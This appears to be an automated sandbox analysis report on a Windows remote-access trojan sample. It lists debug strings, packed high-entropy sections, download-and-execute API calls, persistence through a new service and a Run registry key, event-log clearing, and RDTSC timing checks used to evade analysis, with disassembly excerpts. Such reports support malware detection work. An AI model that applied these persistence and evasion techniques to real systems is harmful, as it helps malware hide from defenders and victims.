                Source: Binary string: wkernelbase.pdbUGP source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521410677.000000000282E000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2197052330.0000000002604000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913041831.0000000002A8D000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2660700372.0000000002861000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946883460.00000000027B9000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2739388386.0000000002592000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wkernel32.pdbUGP source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2223717486.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520956038.00000000022EC000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2909171827.00000000023C2000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2686941457.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946450413.000000000233F000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2762218547.0000000002218000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: advapi32.pdb source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521297160.0000000002600000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2910146848.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946770671.0000000002590000.00000040.00000800.00020000.00000000.sdmp
                Source: Binary string: wuser32.pdbUGP source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521558288.0000000002A5C000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2261759713.0000000002609000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2720432186.00000000024F2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2912752894.0000000002860000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947054584.00000000029ED000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2799524772.0000000002597000.00000004.00000800.00020000.00000000.sdmp

                Data Obfuscation

                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeUnpacked PE file: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.400000.0.unpack .text:EW;.sedata:EW;.idata:W;.rsrc:W;.sedata:R; vs .text:ER;.sedata:ER;.idata:R;.rsrc:R;.sedata:R;
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeUnpacked PE file: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.400000.0.unpack .text:EW;.sedata:EW;.idata:W;.rsrc:W;.sedata:R; vs .text:ER;.sedata:ER;.idata:R;.rsrc:R;.sedata:R;
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeUnpacked PE file: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.400000.0.unpack .text:EW;.sedata:EW;.idata:W;.rsrc:W;.sedata:R; vs .text:ER;.sedata:ER;.idata:R;.rsrc:R;.sedata:R;
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0040FB6E LoadLibraryW,GetProcAddress,FreeLibrary,0_2_0040FB6E
                Source: initial sampleStatic PE information: section where entry point is pointing to: .sedata
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeStatic PE information: section name: .sedata
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeStatic PE information: section name: .sedata
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0048B85F push dword ptr [esp+28h]; retn 002Ch0_2_0048B88D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0041801A push cs; iretd 0_2_004180CE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_004180D1 push cs; iretd 0_2_004180CE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0048B899 push dword ptr [esp+28h]; retn 002Ch0_2_0048B88D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_00495143 pushfd ; mov dword ptr [esp], edx0_2_0049514E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0048B97E push dword ptr [esp+04h]; retn 0008h0_2_0048B9CF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0048B92B push dword ptr [esp+04h]; retn 0008h0_2_0048B9CF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_00485123 push dword ptr [esp+04h]; retn 0008h0_2_00485150
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0048B990 push dword ptr [esp+04h]; retn 0008h0_2_0048B9CF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0048B995 push dword ptr [esp+04h]; retn 0008h0_2_0048B9CF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0048BAF0 push dword ptr [esp+08h]; retn 000Ch0_2_0048BBD1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_00529375 push dword ptr [esp]; mov dword ptr [esp], esi0_2_00529378
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_00485B76 push dword ptr [esp+04h]; retn 0008h0_2_00485C1D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0048BBD8 push dword ptr [esp+08h]; retn 000Ch0_2_0048BBD1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe Code function: 0_2_00405BE0 push eax; ret 0_2_00405C0E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe Code function: 0_2_0048BBBB push dword ptr [esp+08h]; retn 000Ch 0_2_0048BBD1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe Code function: 0_2_0048C43D push dword ptr [esp+04h]; retn 0008h 0_2_0048C6C3
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe Code function: 0_2_00417CDF push esi; ret 0_2_00417CED
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe Code function: 0_2_00485CE0 push dword ptr [esp+40h]; retn 0044h 0_2_00485D1B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe Code function: 0_2_00412E6C push eax; ret 0_2_00412E9A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe Code function: 0_2_00412E28 push eax; ret 0_2_00412E46
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe Code function: 0_2_0048C6D9 push dword ptr [esp+04h]; retn 0008h 0_2_0048C6C3
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe Code function: 0_2_1000ADDC push eax; ret 0_2_1000ADFA
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe Code function: 0_2_1000AE20 push eax; ret 0_2_1000AE4E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe Code function: 0_2_0244D7F6 pushad ; ret 0_2_0244DD90
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe Code function: 4_2_0048B85F push dword ptr [esp+28h]; retn 002Ch 4_2_0048B88D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe Code function: 4_2_0041801A push cs; iretd 4_2_004180CE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe Code function: 4_2_004180D1 push cs; iretd 4_2_004180CE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe Code function: 4_2_0048B899 push dword ptr [esp+28h]; retn 002Ch 4_2_0048B88D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe Code function: 4_2_00495143 pushfd ; mov dword ptr [esp], edx 4_2_0049514E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe Code function: 4_2_0048B97E push dword ptr [esp+04h]; retn 0008h 4_2_0048B9CF
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe Static PE information: section name: .text entropy: 7.927037404813812
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe Static PE information: section name: .sedata entropy: 7.819402663359735
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe Code function: 0_2_0041200B URLDownloadToFileA,ShellExecuteA, 0_2_0041200B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Rsjshd fzfgkqcm
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe Code function: 0_2_00411ACF GetModuleFileNameA,ExpandEnvironmentStringsA,strlen,strncmp,wsprintfA,strlen,strlen,_mbscat,_mbscat,CopyFileA,memset,_mbscpy,SetFileAttributesA,OpenSCManagerA,CreateServiceA,LockServiceDatabase,ChangeServiceConfig2A,ChangeServiceConfig2A,UnlockServiceDatabase,GetLastError,OpenServiceA,StartServiceA,StartServiceA,_mbscpy,_mbscat,RegOpenKeyA,lstrlen,RegSetValueExA, 0_2_00411ACF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Dhttdfv.exe
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe Code function: 0_2_0040D2C9 OpenEventLogA,ClearEventLogA,CloseEventLog, 0_2_0040D2C9
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe API/Special instruction interceptor: Address: 52D156
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe API/Special instruction interceptor: Address: 52D1B0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe API/Special instruction interceptor: Address: 52D48E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe API/Special instruction interceptor: Address: 52D476
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe API/Special instruction interceptor: Address: 52D543
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe API/Special instruction interceptor: Address: 52D798
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe API/Special instruction interceptor: Address: 52D551
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe API/Special instruction interceptor: Address: 52D667
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe API/Special instruction interceptor: Address: 52D64F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe API/Special instruction interceptor: Address: 52E69B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe API/Special instruction interceptor: Address: 52A499
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 52D0C3 second address: 52D156
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 52D156 second address: 52D1B0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 52D486 second address: 52D48E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 52D48E second address: 52D476
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 52D476 second address: 52D543
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 52D543 second address: 52D798
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 52D798 second address: 52D551
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 52D551 second address: 52D6C5
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 52D6C5 second address: 52D667
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 52D667 second address: 52D64F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 52DA6F second address: 52DAB0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 52E047 second address: 52DC15
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 52DF76 second address: 52E073
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 52E68E second address: 52E69B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 4870FE second address: 487106
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 487106 second address: 487356
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 487356 second address: 4872F6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 49799B second address: 497A16
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 48ADEA second address: 48AE34
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 48AFA8 second address: 48B06E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 48B06E second address: 48B186
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 48B47B second address: 48B569
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 48A5A2 second address: 48A562
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 497AC6 second address: 497BD9
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 49928B second address: 4992AB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 4992AB second address: 499323
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 4A94F0 second address: 4A999D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 48B022 second address: 48B186
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 49901A second address: 499086
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 49B208 second address: 4870FE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 49A712 second address: 49A6AB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 499046 second address: 499086
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 4A88E9 second address: 4A88F6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe RDTSC instruction interceptor: First address: 4A88F6 second address: 4A8956
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4A8956 second address: 4870FE instructions: 0x00000000 rdtsc 0x00000002 call 00007F8AB1593EEFh 0x00000007 mov edx, dword ptr [esp+02h] 0x0000000b jmp 00007F8AB1593E86h 0x0000000d add esp, 04h 0x00000010 jns 00007F8AB1593EB9h 0x00000012 pop edi 0x00000013 jmp 00007F8AB1572633h 0x00000018 mov ebx, esi 0x0000001a mov dh, cl 0x0000001c jmp 00007F8AB1593E59h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4992C7 second address: 4992AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB0DEE92Fh 0x00000004 push esi 0x00000005 mov ch, B9h 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4AAC43 second address: 4AAC64 instructions: 0x00000000 rdtsc 0x00000002 xchg cx, dx 0x00000005 jmp 00007F8AB1593ED2h 0x00000007 mov al, dh 0x00000009 xchg dword ptr [esp], esi 0x0000000c setbe ch 0x0000000f mov ch, bl 0x00000011 lea ecx, dword ptr [ebx+54h] 0x00000014 lea esi, dword ptr [esi+27h] 0x00000017 jmp 00007F8AB1593E7Ah 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4AAC64 second address: 49833F instructions: 0x00000000 rdtsc 0x00000002 xchg al, dl 0x00000004 mov dx, word ptr [esp] 0x00000008 xchg dword ptr [esp], esi 0x0000000b jmp 00007F8AB0DEE96Dh 0x0000000d lea eax, dword ptr [00000000h+eax*4] 0x00000014 mov dx, word ptr [esp] 0x00000018 mov ah, 97h 0x0000001a not ah 0x0000001c push dword ptr [esp] 0x0000001f retn 0004h 0x00000022 ja 00007F8AB0DDBFA4h 0x00000028 jmp 00007F8AB0DEE97Dh 0x0000002a movzx ecx, byte ptr [ebp+00h] 0x0000002e sub esp, 00000000h 0x00000031 js 00007F8AB0DEE91Eh 0x00000033 rcl dh, cl 0x00000035 jmp 00007F8AB0DEEA42h 0x0000003a sub esp, 18h 0x0000003d lea eax, dword ptr [eax+ebp] 0x00000040 bswap eax 0x00000042 jmp 00007F8AB0DEE8F8h 0x00000044 bts eax, edx 0x00000047 jmp 00007F8AB0DEE882h 0x0000004c rcl dh, cl 0x0000004e call 00007F8AB0DEE9B0h 0x00000053 mov eax, DD22D1A1h 0x00000058 sub esp, 0Eh 0x0000005b lea esp, dword ptr [esp+06h] 0x0000005f mov ah, dl 0x00000061 xchg eax, edx 0x00000062 jmp 00007F8AB0DEE983h 0x00000064 xchg dword ptr [esp+08h], ebp 0x00000068 bswap edx 0x0000006a mov ah, byte ptr [esp] 0x0000006d lea ebp, dword ptr [ebp+71h] 0x00000070 pushad 0x00000071 lea edx, dword ptr [475C02B4h] 0x00000077 jmp 00007F8AB0DEE927h 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4B9816 second address: 4B97DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB1593E61h 0x00000004 add ebp, 02h 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4872E7 second address: 4872F6 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 765D225Fh 0x00000007 jmp 00007F8AB0DEE931h 0x00000009 mov ecx, FC5B28A4h 0x0000000e bsr ax, si 0x00000012 jmp 00007F8AB0DEE9DEh 0x00000017 sub esi, 68829BC1h 0x0000001d mov dx, word ptr [esp] 0x00000021 jmp 00007F8AB0DEE8E6h 0x00000023 mov dh, byte ptr [esp] 0x00000026 mov al, 1Ah 0x00000028 lea ecx, dword ptr [eax+edx] 0x0000002b setb dh 0x0000002e mov eax, dword ptr [esp] 0x00000031 lea edx, dword ptr [esp+ebx] 0x00000034 jmp 00007F8AB0DEE929h 0x00000036 dec esi 0x00000037 rcr dl, 00000006h 0x0000003a jc 00007F8AB0DEE98Bh 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4B1379 second address: 4B1387 instructions: 0x00000000 rdtsc 0x00000002 neg edx 0x00000004 js 00007F8AB1593E86h 0x00000006 call 00007F8AB1593EDCh 0x0000000b mov ecx, EEB6F27Eh 0x00000010 mov ecx, dword ptr [ebp+00h] 0x00000013 jmp 00007F8AB1593E7Ah 0x00000015 mov ax, word ptr [esp] 0x00000019 mov eax, edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4B8CBF second address: 4AAC43 instructions: 0x00000000 rdtsc 0x00000002 call 00007F8AB0DEE956h 0x00000007 mov byte ptr [esp+01h], dl 0x0000000b clc 0x0000000c jmp 00007F8AB0DEE987h 0x0000000e jnl 00007F8AB0DEE91Fh 0x00000010 sub esi, 08h 0x00000013 jmp 00007F8AB0DEE968h 0x00000015 xchg edx, ecx 0x00000017 call 00007F8AB0DEE985h 0x0000001c lea esp, dword ptr [esp+01h] 0x00000020 push word ptr [esp] 0x00000024 js 00007F8AB0DEE92Bh 0x00000026 jns 00007F8AB0DEE970h 0x00000028 sub esp, 1Ah 0x0000002b lea esp, dword ptr [esp+03h] 0x0000002f jmp 00007F8AB0DEE909h 0x00000031 mov dword ptr [esi], ecx 0x00000033 mov cl, ch 0x00000035 jmp 00007F8AB0DEE96Eh 0x00000037 lea ecx, dword ptr [00000000h+edi*4] 0x0000003e call 00007F8AB0DEE986h 0x00000043 mov byte ptr [esp+01h], dh 0x00000047 mov dword ptr [esi+04h], eax 0x0000004a mov ah, 76h 0x0000004c sub esp, 13h 0x0000004f jmp 00007F8AB0DEE956h 0x00000051 jnbe 00007F8AB0DEE928h 0x00000053 xchg byte ptr [esp+0Dh], ch 0x00000057 call 00007F8AB0DEEA59h 0x0000005c lea esp, dword ptr [esp+03h] 0x00000060 jmp 00007F8AB0DE06FAh 0x00000065 pushad 0x00000066 push word ptr [esp+06h] 0x0000006b jbe 00007F8AB0DEE928h 0x0000006d lea esp, dword ptr [esp+02h] 0x00000071 jmp 00007F8AB0DEE92Ch 0x00000073 lea edx, dword ptr [edi+50h] 0x00000076 xchg eax, ecx 0x00000077 mov eax, dword ptr [esp] 0x0000007a stc 0x0000007b jle 00007F8AB0DEE984h 0x0000007d jnle 00007F8AB0DEE96Ch 0x0000007f cmp esi, edx 0x00000081 call 00007F8AB0DEE966h 0x00000086 lea ecx, dword ptr [00000000h+edx*4] 0x0000008d mov cx, 4E80h 0x00000091 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4B1091 second address: 4AAC43 instructions: 0x00000000 rdtsc 0x00000002 rcl edx, cl 0x00000004 jmp 00007F8AB1593EFFh 0x00000006 jne 00007F8AB1593E47h 0x00000008 mov ax, ss 0x0000000a lea edx, dword ptr [00000000h+eax*4] 0x00000011 push eax 0x00000012 jmp 00007F8AB1593A13h 0x00000017 pop ss 0x00000018 pushfd 0x00000019 jmp 00007F8AB1594356h 0x0000001e pop dword ptr [esi] 0x00000020 mov ecx, dword ptr [esp] 0x00000023 bt edx, ecx 0x00000026 jmp 00007F8AB1593ED6h 0x00000028 jp 00007F8AB1593E70h 0x0000002a call 00007F8AB1593EBAh 0x0000002f jmp 00007F8AB158D9BAh 0x00000034 pushad 0x00000035 push word ptr [esp+06h] 0x0000003a jbe 00007F8AB1593E78h 0x0000003c lea esp, dword ptr [esp+02h] 0x00000040 jmp 00007F8AB1593E7Ch 0x00000042 lea edx, dword ptr [edi+50h] 0x00000045 xchg eax, ecx 0x00000046 mov eax, dword ptr [esp] 0x00000049 stc 0x0000004a jle 00007F8AB1593ED4h 0x0000004c jnle 00007F8AB1593EBCh 0x0000004e cmp esi, edx 0x00000050 call 00007F8AB1593EB6h 0x00000055 lea ecx, dword ptr [00000000h+edx*4] 0x0000005c mov cx, 4E80h 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 499A83 second address: 499A87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB0DEE938h 0x00000004 xchg cx, ax 0x00000007 adc cx, dx 0x0000000a call 00007F8AB0DEE964h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4C6876 second address: 4C6A49 instructions: 0x00000000 rdtsc 0x00000002 neg dl 0x00000004 mov eax, ecx 0x00000006 jmp 00007F8AB159405Ch 0x0000000b lea edi, dword ptr [edi+0005040Bh] 0x00000011 lea eax, dword ptr [CD6A2DD3h] 0x00000017 mov edx, 9C0D1359h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4D99A3 second address: 48810D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB0DEE8DBh 0x00000004 sub ebp, 08h 0x00000007 pushfd 0x00000008 lea esp, dword ptr [esp] 0x0000000b jmp 00007F8AB0DEE9A0h 0x0000000d mov dword ptr [ebp+00h], edx 0x00000010 mov dh, al 0x00000012 sub esp, 18h 0x00000015 jnl 00007F8AB0DEE97Eh 0x00000017 jmp 00007F8AB0DEE93Ah 0x00000019 xchg eax, ecx 0x0000001a bsr dx, si 0x0000001e jnc 00007F8AB0DEE979h 0x00000020 clc 0x00000021 cmc 0x00000022 mov dword ptr [ebp+04h], ecx 0x00000025 mov dx, word ptr [esp] 0x00000029 lea edx, dword ptr [00000000h+edx*4] 0x00000030 jmp 00007F8AB0D9D10Eh 0x00000035 neg eax 0x00000037 jl 00007F8AB0DEE8B2h 0x0000003d jmp 00007F8AB0DEE92Dh 0x0000003f mov ecx, dword ptr [esp] 0x00000042 bsf cx, cx 0x00000046 neg ah 0x00000048 jmp 00007F8AB0DEE931h 0x0000004a lea ecx, dword ptr [edi+50h] 0x0000004d clc 0x0000004e jp 00007F8AB0DEE96Dh 0x00000050 mov dl, C2h 0x00000052 mov dh, byte ptr [esp] 0x00000055 rcl dx, cl 0x00000058 jmp 00007F8AB0DEE99Eh 0x0000005a mov ah, ch 0x0000005c jmp 00007F8AB0DEE92Dh 0x0000005e cmp ebp, ecx 0x00000060 jl 00007F8AB0DEE991h 0x00000062 rdtsc
